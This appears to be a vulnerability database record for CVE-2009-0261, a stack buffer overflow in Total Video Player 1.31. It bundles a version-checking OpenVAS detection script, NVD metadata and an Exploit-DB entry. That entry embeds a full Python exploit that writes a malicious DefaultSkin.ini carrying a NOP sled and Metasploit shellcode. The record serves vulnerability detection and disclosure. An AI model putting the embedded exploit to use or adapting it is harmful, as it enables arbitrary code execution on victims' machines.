ID OPENVAS:1361412562310900454 Type openvas Reporter Copyright (C) 2009 SecPod Modified 2018-09-22T00:00:00
Description
This host is installed with Total Video Player and is prone to
Buffer Overflow vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_tvp_bof_vuln.nasl 11554 2018-09-22 15:11:42Z cfischer $
#
# Total Video Player Buffer Overflow Vulnerability
#
# Authors:
# Sujit Ghosal <sghosal@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900454");
script_version("$Revision: 11554 $");
script_tag(name:"last_modification", value:"$Date: 2018-09-22 17:11:42 +0200 (Sat, 22 Sep 2018) $");
script_tag(name:"creation_date", value:"2009-02-02 05:02:24 +0100 (Mon, 02 Feb 2009)");
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2009-0261");
script_bugtraq_id(33373);
script_name("Total Video Player Buffer Overflow Vulnerability");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/7839");
script_category(ACT_GATHER_INFO);
script_tag(name:"qod_type", value:"registry");
script_copyright("Copyright (C) 2009 SecPod");
script_family("Buffer overflow");
script_dependencies("secpod_tvp_detect.nasl");
script_mandatory_keys("TotalVideo/Player/Ver");
script_tag(name:"impact", value:"Successful exploitation will let the attacker execute arbitrary codes in the
context of the application and can cause stack overflow to make the resource
unavailable.");
script_tag(name:"affected", value:"Total Video Player version 1.31 and prior on Windows.");
script_tag(name:"insight", value:"This flaw is due to improper boundary check at 'DefaultSkin.ini' in the
ColumnHeaderSpan value which copies data to an insufficiently sized memory
buffer.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"This host is installed with Total Video Player and is prone to
Buffer Overflow vulnerability.");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("version_func.inc");
tvpVer = get_kb_item("TotalVideo/Player/Ver");
if(!tvpVer){
exit(0);
}
if(version_is_less_equal(version:tvpVer, test_version:"1.31")){
security_message( port: 0, data: "The target host was found to be vulnerable" );
}
{"id": "OPENVAS:1361412562310900454", "type": "openvas", "bulletinFamily": "scanner", "title": "Total Video Player Buffer Overflow Vulnerability", "description": "This host is installed with Total Video Player and is prone to\n Buffer Overflow vulnerability.", "published": "2009-02-02T00:00:00", "modified": "2018-09-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900454", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://www.milw0rm.com/exploits/7839"], "cvelist": ["CVE-2009-0261"], "lastseen": "2019-05-29T18:40:16", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0261"]}, {"type": "exploitdb", "idList": ["EDB-ID:7839"]}, {"type": "openvas", "idList": ["OPENVAS:900454"]}], "modified": "2019-05-29T18:40:16", "rev": 2}, "score": {"value": 8.7, "vector": "NONE", "modified": "2019-05-29T18:40:16", "rev": 2}, "vulnersScore": 8.7}, "pluginID": "1361412562310900454", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_tvp_bof_vuln.nasl 11554 2018-09-22 15:11:42Z cfischer $\n#\n# Total Video Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900454\");\n script_version(\"$Revision: 11554 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-22 17:11:42 +0200 (Sat, 22 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 05:02:24 +0100 (Mon, 02 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0261\");\n script_bugtraq_id(33373);\n script_name(\"Total Video Player Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7839\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_tvp_detect.nasl\");\n script_mandatory_keys(\"TotalVideo/Player/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application and can cause stack overflow to make the resource\n unavailable.\");\n script_tag(name:\"affected\", value:\"Total Video Player version 1.31 and prior on Windows.\");\n script_tag(name:\"insight\", value:\"This flaw is due to improper boundary check at 'DefaultSkin.ini' in the\n ColumnHeaderSpan value which copies data to an insufficiently sized memory\n buffer.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is installed with Total Video Player and is prone to\n Buffer Overflow vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ntvpVer = get_kb_item(\"TotalVideo/Player/Ver\");\nif(!tvpVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:tvpVer, test_version:\"1.31\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "Buffer overflow", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:39:58", "description": "Stack-based buffer overflow in EffectMatrix Total Video Player 1.31 allows user-assisted attackers to execute arbitrary code via a Skins\\DefaultSkin\\DefaultSkin.ini file with a large ColumnHeaderSpan value.", "edition": 4, "cvss3": {}, "published": "2009-01-23T19:00:00", "title": "CVE-2009-0261", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0261"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:effectmatrix:total_video_player:1.31"], "id": "CVE-2009-0261", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0261", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:effectmatrix:total_video_player:1.31:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T03:10:47", "description": "Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit. CVE-2009-0261. Local exploit for windows platform", "published": "2009-01-20T00:00:00", "type": "exploitdb", "title": "Total Video Player 1.31 DefaultSkin.ini Local Stack Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0261"], "modified": "2009-01-20T00:00:00", "id": "EDB-ID:7839", "href": "https://www.exploit-db.com/exploits/7839/", "sourceData": "#!/usr/bin/python\nimport socket\nprint \"******************************************************\"\nprint \" Total Video Player V1.31 Local Stack Overflow\\n\"\nprint \" Author: His0k4\"\nprint \" Tested on: Windows XP Pro SP2 Fr\\n\"\nprint \" Greetings to:\"\nprint \" All friends & muslims HaCkers(dz)\\n\"\nprint \" dz-secure.com\\n snakespc.com\\n dz-security.net\"\nprint \"******************************************************\"\n\nheader1 = (\n\t\"\\x5B\\x57\\x69\\x6E\\x64\\x6F\\x77\\x73\\x5D\\x0A\\x50\\x6C\\x69\\x73\\x74\\x57\"\n\t\"\\x69\\x6E\\x64\\x6F\\x77\\x20\\x3D\\x20\\x70\\x6C\\x73\\x2E\\x64\\x6C\\x6C\\x2C\"\n\t\"\\x49\\x44\\x0A\\x0A\\x5B\\x4D\\x61\\x69\\x6E\\x57\\x69\\x6E\\x64\\x6F\\x77\\x53\"\n\t\"\\x43\\x52\\x45\\x45\\x4E\\x5D\\x4D\\x61\\x69\\x6E\\x3D\\x4E\\x6F\\x72\\x6D\\x61\"\n\t\"\\x6C\\x2E\\x62\\x6D\\x70\\x0A\\x0A\\x5B\\x50\\x6C\\x69\\x73\\x74\\x57\\x69\\x6E\"\n\t\"\\x64\\x6F\\x77\\x53\\x43\\x52\\x45\\x45\\x4E\\x5D\\x0A\\x4D\\x61\\x69\\x6E\\x3D\"\n\t\"\\x50\\x4C\\x42\\x75\\x74\\x74\\x6F\\x6E\\x4E\\x6F\\x72\\x6D\\x61\\x6C\\x2E\\x62\"\n\t\"\\x6D\\x70\\x0A\\x0A\\x5B\\x50\\x6C\\x69\\x73\\x74\\x57\\x69\\x6E\\x64\\x6F\\x77\"\n\t\"\\x4C\\x49\\x53\\x54\\x43\\x54\\x52\\x4C\\x53\\x54\\x59\\x4C\\x45\\x5D\\x0A\\x43\"\n\t\"\\x6F\\x6C\\x75\\x6D\\x6E\\x48\\x65\\x61\\x64\\x65\\x72\\x53\\x70\\x61\\x6E\\x3D\")\n\nheader2=(\n\t\"\\x2E\\x62\\x6D\\x70\\x0A\\x56\\x65\\x72\\x74\\x69\\x63\\x6C\\x65\\x53\\x63\\x72\"\n\t\"\\x6F\\x6C\\x6C\\x42\\x61\\x72\\x54\\x68\\x75\\x6D\\x62\\x3D\\x56\\x65\\x72\\x74\"\n\t\"\\x69\\x63\\x6C\\x65\\x53\\x63\\x72\\x6F\\x6C\\x6C\\x42\\x61\\x72\\x54\\x68\\x75\"\n\t\"\\x6D\\x62\\x2E\\x62\\x6D\\x70\")\n\n# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com\nshellcode=(\n\t\"\\x29\\xc9\\x83\\xe9\\xde\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd5\"\n\t\"\\xc5\\x35\\xef\\x83\\xeb\\xfc\\xe2\\xf4\\x29\\x2d\\x71\\xef\\xd5\\xc5\\xbe\\xaa\"\n\t\"\\xe9\\x4e\\x49\\xea\\xad\\xc4\\xda\\x64\\x9a\\xdd\\xbe\\xb0\\xf5\\xc4\\xde\\xa6\"\n\t\"\\x5e\\xf1\\xbe\\xee\\x3b\\xf4\\xf5\\x76\\x79\\x41\\xf5\\x9b\\xd2\\x04\\xff\\xe2\"\n\t\"\\xd4\\x07\\xde\\x1b\\xee\\x91\\x11\\xeb\\xa0\\x20\\xbe\\xb0\\xf1\\xc4\\xde\\x89\"\n\t\"\\x5e\\xc9\\x7e\\x64\\x8a\\xd9\\x34\\x04\\x5e\\xd9\\xbe\\xee\\x3e\\x4c\\x69\\xcb\"\n\t\"\\xd1\\x06\\x04\\x2f\\xb1\\x4e\\x75\\xdf\\x50\\x05\\x4d\\xe3\\x5e\\x85\\x39\\x64\"\n\t\"\\xa5\\xd9\\x98\\x64\\xbd\\xcd\\xde\\xe6\\x5e\\x45\\x85\\xef\\xd5\\xc5\\xbe\\x87\"\n\t\"\\xe9\\x9a\\x04\\x19\\xb5\\x93\\xbc\\x17\\x56\\x05\\x4e\\xbf\\xbd\\x35\\xbf\\xeb\"\n\t\"\\x8a\\xad\\xad\\x11\\x5f\\xcb\\x62\\x10\\x32\\xa6\\x54\\x83\\xb6\\xc5\\x35\\xef\")\n\t\nbuffer = header1 + \"\\x41\"*221 + \"\\x7C\\xE1\\xA7\\x7C\" + \"\\x90\"*20 + shellcode + header2\n\ntry:\n out_file = open(\"DefaultSkin.ini\",'w')\n out_file.write(buffer)\n out_file.close()\n print(\"\\n Exploit file created!, Now replace this file in Skins\\DefaultSkin folder\\n and run the program\\n\")\nexcept:\n print \"Error\"\n\n# milw0rm.com [2009-01-20]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7839/"}], "openvas": [{"lastseen": "2017-07-02T21:14:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0261"], "description": "This host is installed with Total Video Player and is prone to\n Buffer Overflow vulnerability.", "modified": "2017-01-31T00:00:00", "published": "2009-02-02T00:00:00", "id": "OPENVAS:900454", "href": "http://plugins.openvas.org/nasl.php?oid=900454", "type": "openvas", "title": "Total Video Player Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_tvp_bof_vuln.nasl 5148 2017-01-31 13:16:55Z teissa $\n#\n# Total Video Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application and can cause stack overflow to make the resource\n unavailable.\n Impact Level: Application\";\ntag_affected = \"Total Video Player version 1.31 and prior on Windows.\";\ntag_insight = \"This flaw is due to improper boundary check at 'DefaultSkin.ini' in the\n ColumnHeaderSpan value which copies data to an insufficiently sized memory\n buffer.\";\ntag_solution = \"No solution or patch was made available for at least one year since disclosure\n of this vulnerability. Likely none will be provided anymore. General solution\n options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\n For updates refer to http://www.effectmatrix.com/total-video-player/index.htm\";\ntag_summary = \"This host is installed with Total Video Player and is prone to\n Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(900454);\n script_version(\"$Revision: 5148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 05:02:24 +0100 (Mon, 02 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0261\");\n script_bugtraq_id(33373);\n script_name(\"Total Video Player Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7839\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_tvp_detect.nasl\");\n script_require_keys(\"TotalVideo/Player/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ntvpVer = get_kb_item(\"TotalVideo/Player/Ver\");\nif(!tvpVer){\n exit(0);\n}\n\n# Check for Total Video Player version 1.31 and prior\nif(version_is_less_equal(version:tvpVer, test_version:\"1.31\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}